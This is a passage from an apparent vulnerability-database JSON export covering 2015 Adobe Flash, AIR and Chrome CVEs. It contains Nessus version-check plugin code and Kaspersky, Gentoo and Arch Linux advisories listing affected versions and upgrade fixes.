CVE-2015-0358,\n CVE-2015-3039)\n\n - An unspecified type confusion flaw exists that allows\n an attacker to execute arbitrary code. (CVE-2015-0356)\n\n - Multiple unspecified memory leaks exist that allows an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-0357,\n CVE-2015-3040)\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose information. (CVE-2015-3044)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-06.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR 17.0.0.172 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player domainMemory ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_air_installed.nasl\");\n script_require_keys(\"SMB/Adobe_AIR/Version\", \"SMB/Adobe_AIR/Path\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Adobe_AIR/Version\");\npath = get_kb_item_or_exit(\"SMB/Adobe_AIR/Path\");\n\nversion_ui = get_kb_item(\"SMB/Adobe_AIR/Version_UI\");\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui + ' (' + version + ')';\n\ncutoff_version = '17.0.0.144';\nfix = '17.0.0.172';\nfix_ui = '17.0';\n\nif (ver_compare(ver:version, fix:cutoff_version) <= 0)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_report +\n '\\n Fixed version : ' + fix_ui + \" (\" + fix + ')' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version_report, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:30:18", "description": "The version of Google Chrome installed on the remote Mac OS X host is\nprior to 42.0.2311.152. It is, therefore, affected by multiple\nvulnerabilities related to Adobe Flash :\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a\n context-dependent attacker to disclose sensitive\n information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows\n an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - Multiple validation bypass vulnerabilities exists that\n allow an attacker to lead to write arbitrary data to the\n file system. (CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3085)\n\n - An integer overflow condition exists due to improper\n validation of user-supplied input. This allows a\n context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-3091,\n CVE-2015-3092)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 26, "published": "2015-05-12T00:00:00", "title": "Google Chrome < 42.0.2311.152 Multiple Vulnerabilities (Mac OS X)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_42_0_2311_152.NASL", "href": "https://www.tenable.com/plugins/nessus/83368", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83368);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-3044\",\n \"CVE-2015-3077\",\n \"CVE-2015-3078\",\n \"CVE-2015-3079\",\n \"CVE-2015-3080\",\n \"CVE-2015-3082\",\n \"CVE-2015-3083\",\n \"CVE-2015-3084\",\n \"CVE-2015-3085\",\n \"CVE-2015-3086\",\n \"CVE-2015-3087\",\n \"CVE-2015-3088\",\n \"CVE-2015-3089\",\n \"CVE-2015-3090\",\n \"CVE-2015-3091\",\n \"CVE-2015-3092\",\n \"CVE-2015-3093\"\n );\n script_bugtraq_id(\n 74605,\n 74608,\n 74609,\n 74610,\n 74612,\n 74614,\n 74616,\n 74617\n );\n\n script_name(english:\"Google Chrome < 42.0.2311.152 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\nprior to 42.0.2311.152. It is, therefore, affected by multiple\nvulnerabilities related to Adobe Flash :\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a\n context-dependent attacker to disclose sensitive\n information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows\n an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - Multiple validation bypass vulnerabilities exists that\n allow an attacker to lead to write arbitrary data to the\n file system. (CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3085)\n\n - An integer overflow condition exists due to improper\n validation of user-supplied input. This allows a\n context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-3091,\n CVE-2015-3092)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2015/05/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7417f6c2\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 42.0.2311.152 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3093\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ShaderJob Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'42.0.2311.152', severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:42:46", "bulletinFamily": "info", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "### *Detect date*:\n04/14/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMemory corruption, buffer overflow, use-after-free, double free and memory leak vulnerabilities were found in Adobe Flash. By exploiting these vulnerabilities malicious users can bypass security restrictions, execute arbitrary code or obtain sensitive information. These vulnerabilities can be exploited remotely via an unknown vectors.\n\n### *Affected products*:\nAdobe Flash Player for Linux versions earlier than 11.2.202.457 \nAdobe Flash Player versions earlier than 17.0.0.169 \nAdobe Flash Player Extended Support versions earlier than 13.0.0.281\n\n### *Solution*:\nUpdate to the latest version \n[Get Flash Player](<https://get2.adobe.com/flashplayer/>)\n\n### *Original advisories*:\n[Adobe bulletin](<https://helpx.adobe.com/security/products/flash-player/apsb15-06.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Flash Player ActiveX](<https://threats.kaspersky.com/en/product/Adobe-Flash-Player-ActiveX/>)\n\n### *CVE-IDS*:\n[CVE-2015-0354](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0354>)10.0Critical \n[CVE-2015-0355](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0355>)10.0Critical \n[CVE-2015-0352](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0352>)10.0Critical \n[CVE-2015-0353](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0353>)10.0Critical \n[CVE-2015-0350](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0350>)10.0Critical \n[CVE-2015-0351](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0351>)10.0Critical \n[CVE-2015-0348](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0348>)10.0Critical \n[CVE-2015-0349](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0349>)10.0Critical \n[CVE-2015-0346](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0346>)10.0Critical \n[CVE-2015-0347](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0347>)10.0Critical \n[CVE-2015-0357](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0357>)5.0Critical \n[CVE-2015-0356](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0356>)10.0Critical \n[CVE-2015-0359](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0359>)10.0Critical \n[CVE-2015-0358](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0358>)10.0Critical \n[CVE-2015-0360](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0360>)10.0Critical \n[CVE-2015-3038](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3038>)10.0Critical \n[CVE-2015-3039](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3039>)10.0Critical \n[CVE-2015-3042](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3042>)10.0Critical \n[CVE-2015-3043](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3043>)10.0Critical \n[CVE-2015-3040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3040>)5.0Critical \n[CVE-2015-3041](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3041>)10.0Critical \n[CVE-2015-3044](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3044>)5.0Critical\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 41, "modified": "2020-06-18T00:00:00", "published": "2015-04-14T00:00:00", "id": "KLA10547", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10547", "title": "\r KLA10547Multiple vulnerabilities in Adobe Flash Player ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:42:03", "bulletinFamily": "info", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "### *Detect date*:\n05/12/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Adobe products. Malicious users can exploit these vulnerabilities to write local files, bypass security restrictions, execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nAdobe Flash Player versions earlier than 17.0.0.188 for OS X and Windows \nAdobe Flash Player ESR versions earlier than 13.0.0.289 \nAdobe Flash Player versions earlier than 11.2.202.460 for Linux \nAdobe AIR runtime, SDK and Compiler versions earlier than 17.0.0.172\n\n### *Solution*:\nUpdate to the latest version \n[Get Flash Player](<https://get.adobe.com/flashplayer/>) \n[Get AIR](<https://get.adobe.com/air/>)\n\n### *Original advisories*:\n[Adobe bulletin](<https://helpx.adobe.com/security/products/flash-player/apsb15-09.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Flash Player ActiveX](<https://threats.kaspersky.com/en/product/Adobe-Flash-Player-ActiveX/>)\n\n### *CVE-IDS*:\n[CVE-2015-3044](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3044>)5.0Critical \n[CVE-2015-3089](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3089>)10.0Critical \n[CVE-2015-3088](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3088>)10.0Critical \n[CVE-2015-3084](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3084>)10.0Critical \n[CVE-2015-3086](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3086>)10.0Critical \n[CVE-2015-3091](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3091>)5.0Critical \n[CVE-2015-3078](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3078>)10.0Critical \n[CVE-2015-3079](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3079>)5.0Critical \n[CVE-2015-3080](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3080>)10.0Critical \n[CVE-2015-3081](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3081>)4.3Warning \n[CVE-2015-3092](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3092>)5.0Critical \n[CVE-2015-3090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3090>)10.0Critical \n[CVE-2015-3087](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3087>)10.0Critical \n[CVE-2015-3077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3077>)10.0Critical \n[CVE-2015-3085](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3085>)6.4High \n[CVE-2015-3083](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3083>)6.4High \n[CVE-2015-3082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3082>)6.4High \n[CVE-2015-3093](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3093>)10.0Critical\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 41, "modified": "2020-06-18T00:00:00", "published": "2015-05-12T00:00:00", "id": "KLA10574", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10574", "title": "\r KLA10574Multiple vulnerabilities in Adobe Flash Player ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T12:00:17", "bulletinFamily": "info", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "### *Detect date*:\n05/12/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nGoogle Chrome was updated to address vulnerabilities in Flash Player. For details look at KLA10574.\n\n### *Affected products*:\nGoogle Chrome versions earlier than 42.0.2311.152\n\n### *Solution*:\nUpdate to the latest version. File with name old_chrome can be still detected after update. It caused by Google Chrome update policy which does not remove old versions when installing updates. Try to contact vendor for further delete instructions or ignore such kind of alerts at your own risk. \n[Get Google Chrome](<https://www.google.com/chrome/browser/desktop/>)\n\n### *Original advisories*:\n[Google blog record](<http://googlechromereleases.blogspot.ru/2015/05/stable-channel-update.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+GoogleChromeReleases+\$Google+Chrome+Releases\$>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2015-3044](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3044>)5.0Critical \n[CVE-2015-3089](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3089>)10.0Critical \n[CVE-2015-3088](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3088>)10.0Critical \n[CVE-2015-3084](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3084>)10.0Critical \n[CVE-2015-3086](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3086>)10.0Critical \n[CVE-2015-3091](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3091>)5.0Critical \n[CVE-2015-3078](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3078>)10.0Critical \n[CVE-2015-3079](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3079>)5.0Critical \n[CVE-2015-3080](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3080>)10.0Critical \n[CVE-2015-3081](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3081>)4.3Warning \n[CVE-2015-3092](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3092>)5.0Critical \n[CVE-2015-3090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3090>)10.0Critical \n[CVE-2015-3087](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3087>)10.0Critical \n[CVE-2015-3077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3077>)10.0Critical \n[CVE-2015-3085](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3085>)6.4High \n[CVE-2015-3083](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3083>)6.4High \n[CVE-2015-3082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3082>)6.4High \n[CVE-2015-3093](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3093>)10.0Critical\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 43, "modified": "2020-06-18T00:00:00", "published": "2015-05-12T00:00:00", "id": "KLA10576", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10576", "title": "\r KLA10576Flash Player update for Google Chrome ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:05", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-plugins/adobe-flash-11.2.202.457\"", "edition": 1, "modified": "2015-04-17T00:00:00", "published": "2015-04-17T00:00:00", "id": "GLSA-201504-07", "href": "https://security.gentoo.org/glsa/201504-07", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-06T19:46:15", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-plugins/adobe-flash-11.2.202.460\"", "edition": 1, "modified": "2015-05-31T00:00:00", "published": "2015-05-31T00:00:00", "id": "GLSA-201505-02", "href": "https://security.gentoo.org/glsa/201505-02", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:37", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "- CVE-2015-0346 (arbitrary code execution)\n\nA double-free vulnerability allows attackers to execute arbitrary code\nvia unspecified vectors.\n\n- CVE-2015-0347 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-0348 (arbitrary code execution)\n\nA buffer overflow vulnerability that could lead to arbitrary code\nexecution via unspecified vectors.\n\n- CVE-2015-0349 (arbitrary code execution)\n\nA use-after-free vulnerability that could lead to arbitrary code\nexecution via unspecified vectors.\n\n- CVE-2015-0350 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-0351 (arbitrary code execution)\n\nA use-after-free vulnerability that could lead to arbitrary code\nexecution via unspecified vectors.\n\n- CVE-2015-0352 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-0353 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-0354 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-0355 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-0356 (arbitrary code execution)\n\nA type confusion vulnerability that could lead to arbitrary code\nexecution via unspecified vectors.\n\n- CVE-2015-0357 (ASLR protection bypass)\n\nFlash does not properly restrict discovery of memory addresses, which\nallows attackers to bypass the ASLR protection mechanism via unspecified\nvectors.\n\n- CVE-2015-0358 (arbitrary code execution)\n\nA use-after-free vulnerability that could lead to arbitrary code\nexecution via unspecified vectors.\n\n- CVE-2015-0359 (arbitrary code execution)\n\nA double-free vulnerability allows attackers to execute arbitrary code\nvia unspecified vectors.\n\n- CVE-2015-0360 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-3038 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-3039 (arbitrary code execution)\n\nA use-after-free vulnerability that could lead to arbitrary code\nexecution via unspecified vectors.\n\n- CVE-2015-3040 (ASLR protection bypass)\n\nFlash does not properly restrict discovery of memory addresses, which\nallows attackers to bypass the ASLR protection mechanism via unspecified\nvectors.\n\n- CVE-2015-3041 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-3042 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-3043 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-3044 (information disclosure)\n\nAttackers are able to bypass intended access restrictions and obtain\nsensitive information via unspecified vectors.", "modified": "2015-04-17T00:00:00", "published": "2015-04-17T00:00:00", "id": "ASA-201504-18", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-April/000297.html", "type": "archlinux", "title": "flashplugin: multiple issues", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], 